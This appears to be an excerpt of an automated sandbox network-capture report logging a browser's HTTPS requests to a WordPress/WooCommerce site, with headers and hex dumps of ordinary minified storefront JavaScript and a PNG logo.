                                                                                                                                                                                              Data Ascii: TabKey){var o=l,n=!t.shiftKey&&t.target===o[o.length-1],i=t.shiftKey&&t.target===o[0];if(n||i)return setTimeout(function(){f(i)},10),!1}var d=t.data,a=e(t.target);return a.hasClass("blockOverlay")&&d.onOverlayClick&&d.onOverlayClick(t),a.parents("div."+d.
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 28 29 2c 61 2e 72 65 71 75 65 73 74 73 2e 73 68 69 66 74 28 29 2c 61 2e 72 65 71 75 65 73 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 61 2e 72 75 6e 28 29 7d 2c 74 2e 61 6a 61 78 28 74 68 69 73 2e 72 65 71 75 65 73 74 73 5b 30 5d 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 41 64 64 54 6f 43 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 69 66 28 65 2e 69 73 28 22 2e 61 6a 61 78 5f 61 64 64 5f 74 6f 5f 63 61 72 74 22 29 29 7b 69 66 28 21 65 2e 61 74 74 72 28 22 64 61 74 61 2d 70 72 6f 64 75 63 74 5f 69 64 22 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 61 2e 64 61 74 61 2e 61 64 64 54 6f 43 61 72 74 48 61 6e 64 6c 65 72 2e 24 6c 69 76 65 52 65 67 69 6f 6e 2e 74 65 78 74 28
                                                                                                                                                                                              Data Ascii: "==typeof e&&e(),a.requests.shift(),a.requests.length>0&&a.run()},t.ajax(this.requests[0])},a.prototype.onAddToCart=function(a){var e=t(this);if(e.is(".ajax_add_to_cart")){if(!e.attr("data-product_id"))return!0;if(a.data.addToCartHandler.$liveRegion.text(
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 2e 77 63 5f 61 6a 61 78 5f 75 72 6c 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 22 25 25 65 6e 64 70 6f 69 6e 74 25 25 22 2c 22 72 65 6d 6f 76 65 5f 66 72 6f 6d 5f 63 61 72 74 22 29 2c 64 61 74 61 3a 7b 63 61 72 74 5f 69 74 65 6d 5f 6b 65 79 3a 65 2e 64 61 74 61 28 22 63 61 72 74 5f 69 74 65 6d 5f 6b 65 79 22 29 7d 2c 73 75 63 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 26 61 2e 66 72 61 67 6d 65 6e 74 73 3f 74 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 74 72 69 67 67 65 72 28 22 72 65 6d 6f 76 65 64 5f 66 72 6f 6d 5f 63 61 72 74 22 2c 5b 61 2e 66 72 61 67 6d 65 6e 74 73 2c 61 2e 63 61 72 74 5f 68 61 73 68 2c 65 5d 29 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 65 2e 61 74
                                                                                                                                                                                              Data Ascii: to_cart_params.wc_ajax_url.toString().replace("%%endpoint%%","remove_from_cart"),data:{cart_item_key:e.data("cart_item_key")},success:function(a){a&&a.fragments?t(document.body).trigger("removed_from_cart",[a.fragments,a.cart_hash,e]):window.location=e.at


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              67192.168.2.549800141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1675OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-54e41265.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:25 UTC490INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-c035"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6836
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fb0bb14de9b-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:25 UTC879INData Raw: 37 64 63 37 0d 0a 0a 0a 76 61 72 20 45 6c 65 6d 65 6e 74 6f 72 50 72 6f 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 20 3d 20 7b 22 61 6a 61 78 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6d 62 69 72 2e 63 6f 6d 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 64 38 35 65 33 66 32 63 65 22 2c 22 75 72 6c 73 22 3a 7b 22 61 73 73 65 74 73 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6d 62 69 72 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 70 6c 75 67 69 6e 73 5c 2f 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 5c 2f 61 73 73 65 74 73 5c 2f 22 2c 22 72 65 73 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6d 62 69 72 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 7d 2c 22 73 65 74 74 69 6e 67
                                                                                                                                                                                              Data Ascii: 7dc7var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/ambir.com\/wp-admin\/admin-ajax.php","nonce":"fd85e3f2ce","urls":{"assets":"https:\/\/ambir.com\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/ambir.com\/wp-json\/"},"setting
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 6b 65 74 22 2c 22 68 61 73 5f 63 6f 75 6e 74 65 72 22 3a 74 72 75 65 7d 2c 22 78 69 6e 67 22 3a 7b 22 74 69 74 6c 65 22 3a 22 58 49 4e 47 22 2c 22 68 61 73 5f 63 6f 75 6e 74 65 72 22 3a 74 72 75 65 7d 2c 22 77 68 61 74 73 61 70 70 22 3a 7b 22 74 69 74 6c 65 22 3a 22 57 68 61 74 73 41 70 70 22 7d 2c 22 65 6d 61 69 6c 22 3a 7b 22 74 69 74 6c 65 22 3a 22 45 6d 61 69 6c 22 7d 2c 22 70 72 69 6e 74 22 3a 7b 22 74 69 74 6c 65 22 3a 22 50 72 69 6e 74 22 7d 2c 22 78 2d 74 77 69 74 74 65 72 22 3a 7b 22 74 69 74 6c 65 22 3a 22 58 22 7d 2c 22 74 68 72 65 61 64 73 22 3a 7b 22 74 69 74 6c 65 22 3a 22 54 68 72 65 61 64 73 22 7d 7d 2c 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 22 3a 7b 22 6d 65 6e 75 5f 63 61 72 74 22 3a 7b 22 63 61 72 74 5f 70 61 67 65 5f 75 72 6c 22 3a 22 68
                                                                                                                                                                                              Data Ascii: ket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"},"x-twitter":{"title":"X"},"threads":{"title":"Threads"}},"woocommerce":{"menu_cart":{"cart_page_url":"h
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 68 61 6e 64 6c 65 72 73 22 2c 65 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 28 28 65 2c 74 29 3d 3e 7b 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 65 5d 3d 6e 65 77 20 74 7d 29 29 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 2e 6c 69 6e 6b 41 63 74 69 6f 6e 73 3d 7b 61 64 64 41 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 75 74 69 6c 73 2e 75 72 6c 41 63 74 69 6f 6e 73 2e 61 64 64 41 63 74 69 6f 6e 28 2e 2e 2e 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 6f 6e 45 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 49 6e 69 74 28 29 7b 74 68 69 73 2e 69 6e 69 74 4d 6f 64 75 6c 65 73 28 29 7d 69 6e 69 74 4f 6e 52 65 61 64 79 43 6f 6d 70 6f 6e 65 6e 74 73 28 29 7b 74 68 69 73 2e 75 74 69 6c 73 3d 7b 63 6f 6e 74 72
                                                                                                                                                                                              Data Ascii: handlers",e),jQuery.each(e,((e,t)=>{this.modules[e]=new t})),this.modules.linkActions={addAction:function(){elementorFrontend.utils.urlActions.addAction(...arguments)}}}onElementorFrontendInit(){this.initModules()}initOnReadyComponents(){this.utils={contr
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 75 48 65 69 67 68 74 43 73 73 56 61 72 4e 61 6d 65 2c 22 22 29 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 65 6c 65 6d 65 6e 74 73 2e 24 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6e 74 61 69 6e 65 72 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 3b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2e 68 65 69 67 68 74 28 29 2d 65 7d 63 61 6c 63 75 6c 61 74 65 4d 65 6e 75 54 61 62 43 6f 6e 74 65 6e 74 48 65 69 67 68 74 28 65 29 7b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2e 68 65 69 67 68 74 28
                                                                                                                                                                                              Data Ascii: uHeightCssVarName,"");const e=this.widgetConfig.elements.$dropdownMenuContainer.offset().top-jQuery(window).scrollTop();return elementorFrontend.elements.$window.height()-e}calculateMenuTabContentHeight(e){return elementorFrontend.elements.$window.height(
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 2e 68 61 73 43 6c 61 73 73 28 74 68 69 73 2e 77 69 64 67 65 74 43 6f 6e 66 69 67 2e 63 6c 61 73 73 65 73 2e 6d 65 6e 75 54 6f 67 67 6c 65 41 63 74 69 76 65 43 6c 61 73 73 29 7d 7d 7d 2c 32 32 35 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 70 3d 45 6c 65 6d 65 6e 74 6f 72 50 72 6f 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 2e 75 72 6c 73 2e 61 73 73 65 74 73 2b 22 6a 73 2f 22 7d 2c 34 34 30 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 3b 63 6c 61 73 73 20 5f 64 65 66 61 75 6c 74 20 65 78 74 65 6e 64
                                                                                                                                                                                              Data Ascii: .hasClass(this.widgetConfig.classes.menuToggleActiveClass)}}},2258:(e,t,n)=>{"use strict";n.p=ElementorProFrontendConfig.urls.assets+"js/"},4409:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extend
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 2e 67 65 74 45 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 28 22 6d 6f 74 69 6f 6e 5f 66 78 5f 6d 6f 74 69 6f 6e 5f 66 78 5f 73 63 72 6f 6c 6c 69 6e 67 22 29 26 26 21 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 45 76 65 6e 74 41 64 64 65 64 26 26 28 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 45 76 65 6e 74 41 64 64 65 64 3d 21 30 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 6f 6e 74 61 69 6e 65 72 2e 6f 6e 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 28 28 29 3d 3e 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 6f 6e 74 61 69 6e 65 72 2e 63 73 73 28 22 2d 2d 65 2d 74 72 61 6e 73 66 6f 72 6d 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 22 2c 22 22 29 7d 29 29 29 7d 69 6e 69 74 45 66 66 65 63 74 73 28 29 7b 74 68 69 73 2e
                                                                                                                                                                                              Data Ascii: .getElementSettings("motion_fx_motion_fx_scrolling")&&!this.isTransitionEventAdded&&(this.isTransitionEventAdded=!0,this.elements.$container.on("mouseenter",(()=>{this.elements.$container.css("--e-transform-transition-duration","")})))}initEffects(){this.
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 20 22 2b 65 29 7d 63 6f 6e 73 74 20 61 3d 7b 74 79 70 65 3a 6e 2c 69 6e 74 65 72 61 63 74 69 6f 6e 73 3a 73 2c 65 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 3a 74 2c 24 65 6c 65 6d 65 6e 74 3a 6f 2c 24 64 69 6d 65 6e 73 69 6f 6e 73 45 6c 65 6d 65 6e 74 3a 69 2c 72 65 66 72 65 73 68 44 69 6d 65 6e 73 69 6f 6e 73 3a 74 68 69 73 2e 69 73 45 64 69 74 2c 72 61 6e 67 65 3a 74 5b 65 2b 22 5f 72 61 6e 67 65 22 5d 2c 63 6c 61 73 73 65 73 3a 7b 65 6c 65 6d 65 6e 74 3a 22 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 65 6c 65 6d 65 6e 74 22 2c 70 61 72 65 6e 74 3a 22 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 70 61 72 65 6e 74 22 2c 62 61 63 6b 67 72 6f 75 6e 64 54 79 70 65 3a 22 65 6c 65 6d 65 6e 74 6f 72
                                                                                                                                                                                              Data Ascii: "+e)}const a={type:n,interactions:s,elementSettings:t,$element:o,$dimensionsElement:i,refreshDimensions:this.isEdit,range:t[e+"_range"],classes:{element:"elementor-motion-effects-element",parent:"elementor-motion-effects-parent",backgroundType:"elementor
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 69 73 2e 74 6f 67 67 6c 65 28 29 7d 6f 6e 45 6c 65 6d 65 6e 74 43 68 61 6e 67 65 28 65 29 7b 69 66 28 2f 6d 6f 74 69 6f 6e 5f 66 78 5f 28 28 73 63 72 6f 6c 6c 69 6e 67 29 7c 28 6d 6f 75 73 65 29 7c 28 64 65 76 69 63 65 73 29 29 24 2f 2e 74 65 73 74 28 65 29 29 72 65 74 75 72 6e 22 6d 6f 74 69 6f 6e 5f 66 78 5f 6d 6f 74 69 6f 6e 5f 66 78 5f 73 63 72 6f 6c 6c 69 6e 67 22 3d 3d 3d 65 26 26 74 68 69 73 2e 61 64 64 43 53 53 54 72 61 6e 73 66 6f 72 6d 45 76 65 6e 74 73 28 29 2c 76 6f 69 64 20 74 68 69 73 2e 74 6f 67 67 6c 65 28 29 3b 63 6f 6e 73 74 20 74 3d 65 2e 6d 61 74 63 68 28 22 2e 2a 3f 28 6d 6f 74 69 6f 6e 5f 66 78 7c 5f 74 72 61 6e 73 66 6f 72 6d 29 22 29 3b 69 66 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 5b 30 5d 2e 6d 61 74 63 68 28 22 28 5f 74 72 61 6e
                                                                                                                                                                                              Data Ascii: is.toggle()}onElementChange(e){if(/motion_fx_((scrolling)|(mouse)|(devices))$/.test(e))return"motion_fx_motion_fx_scrolling"===e&&this.addCSSTransformEvents(),void this.toggle();const t=e.match(".*?(motion_fx|_transform)");if(t){const e=t[0].match("(_tran
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 74 29 2c 22 69 6e 2d 6f 75 74 22 3d 3d 3d 74 26 26 28 73 3d 31 30 30 2d 73 29 29 3a 22 69 6e 2d 6f 75 74 22 3d 3d 3d 74 3f 73 3d 30 3a 22 6f 75 74 2d 69 6e 22 3d 3d 3d 74 3f 73 3d 31 30 30 3a 28 73 3d 74 68 69 73 2e 67 65 74 4d 6f 76 65 50 6f 69 6e 74 46 72 6f 6d 50 61 73 73 65 64 50 65 72 63 65 6e 74 73 28 31 30 30 2d 6e 2e 65 6e 64 2c 31 30 30 2d 65 29 2c 22 69 6e 2d 6f 75 74 2d 69 6e 22 3d 3d 3d 74 26 26 28 73 3d 31 30 30 2d 73 29 29 2c 73 7d 74 72 61 6e 73 6c 61 74 65 58 28 65 2c 74 29 7b 65 2e 61 78 69 73 3d 22 78 22 2c 65 2e 75 6e 69 74 3d 22 70 78 22 2c 74 68 69 73 2e 74 72 61 6e 73 66 6f 72 6d 28 22 74 72 61 6e 73 6c 61 74 65 58 22 2c 74 2c 65 29 7d 74 72 61 6e 73 6c 61 74 65 59 28 65 2c 74 29 7b 65 2e 61 78 69 73 3d 22 79 22 2c 65 2e 75 6e 69 74
                                                                                                                                                                                              Data Ascii: t),"in-out"===t&&(s=100-s)):"in-out"===t?s=0:"out-in"===t?s=100:(s=this.getMovePointFromPassedPercents(100-n.end,100-e),"in-out-in"===t&&(s=100-s)),s}translateX(e,t){e.axis="x",e.unit="px",this.transform("translateX",t,e)}translateY(e,t){e.axis="y",e.unit
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 7b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 67 65 74 44 69 72 65 63 74 69 6f 6e 4d 6f 76 65 50 6f 69 6e 74 28 74 2c 65 2e 64 69 72 65 63 74 69 6f 6e 2c 65 2e 72 61 6e 67 65 29 2c 73 3d 65 2e 6c 65 76 65 6c 2d 74 68 69 73 2e 67 65 74 45 66 66 65 63 74 56 61 6c 75 65 46 72 6f 6d 4d 6f 76 65 50 6f 69 6e 74 28 65 2e 6c 65 76 65 6c 2c 6e 29 3b 74 68 69 73 2e 75 70 64 61 74 65 52 75 6c 65 50 61 72 74 28 22 66 69 6c 74 65 72 22 2c 22 62 6c 75 72 22 2c 73 2b 22 70 78 22 29 7d 75 70 64 61 74 65 52 75 6c 65 50 61 72 74 28 65 2c 74 2c 6e 29 7b 74 68 69 73 2e 72 75 6c 65 73 56 61 72 69 61 62 6c 65 73 5b 65 5d 7c 7c 28 74 68 69 73 2e 72 75 6c 65 73 56 61 72 69 61 62 6c 65 73 5b 65 5d 3d 7b 7d 29 2c 74 68 69 73 2e 72 75 6c 65 73 56 61 72 69 61 62 6c 65 73 5b 65 5d 5b 74
                                                                                                                                                                                              Data Ascii: {const n=this.getDirectionMovePoint(t,e.direction,e.range),s=e.level-this.getEffectValueFromMovePoint(e.level,n);this.updateRulePart("filter","blur",s+"px")}updateRulePart(e,t,n){this.rulesVariables[e]||(this.rulesVariables[e]={}),this.rulesVariables[e][t


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              68192.168.2.549802141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1631OUTGET /wp-content/uploads/2024/10/logo.png HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:25 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                              Content-Length: 6430
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origSize=7047
                                                                                                                                                                                              ETag: "671034a1-1b87"
                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 21:48:17 GMT
                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 10824
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fb0af4617bd-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:25 UTC903INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 01 39 08 03 00 00 00 b7 78 29 4a 00 00 03 00 50 4c 54 45 47 70 4c cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb 68 28 cb
                                                                                                                                                                                              Data Ascii: PNGIHDR9x)JPLTEGpLh(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(h(
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 9e 76 9a a1 98 9b 11 fa 0f dc 7c b0 aa a9 ac ad ae b3 37 48 35 c4 bf b9 92 a8 b5 a3 60 28 2b 40 58 2d 1a 3a 3d 70 53 77 8e 90 6e 4d 3f d3 e0 03 02 ed f2 fd 8f d0 3e 31 41 33 2a 2c bd a5 a6 d6 d5 f5 ec 08 e1 da de e2 f4 2f 13 3b 4b 4f 52 15 3c cf 59 c7 d8 cb b6 d4 bb ca cd 39 4a 1b 29 69 65 74 57 78 f8 1c f7 b1 8b c1 c0 83 d2 c9 34 45 42 5b 5d e9 f3 19 44 38 8d 0b 80 7e 6f d9 01 71 73 b4 c5 9f 9d af b7 27 82 09 f1 07 4e dd eb 91 88 db cc e6 e5 6b ee 0a 18 25 fe 24 fc 14 f0 0c 0d ea e8 0e f6 7a ce b8 85 c2 b2 99 ff c3 94 e2 44 7b 00 00 14 cd 49 44 41 54 78 da ec d1 a1 4e 42 51 00 80 e1 33 09 8a 33 99 b5 99 9c 73 73 06 71 e2 7c 00 93 73 da a0 38 65 56 02 08 d1 68 d0 27 80 66 33 89 e6 1b 64 4e bb d5 8d 8d cc 06 0f 00 97 57 60 70 76 29 df f7 08 ff 1f 00 00 00
                                                                                                                                                                                              Data Ascii: v|7H5`(+@X-:=pSwnM?>1A3*,/;KOR<Y9J)ietWx4EB[]D8~oqs'Nk%$zD{IDATxNBQ33ssq|s8eVh'f3dNW`pv)
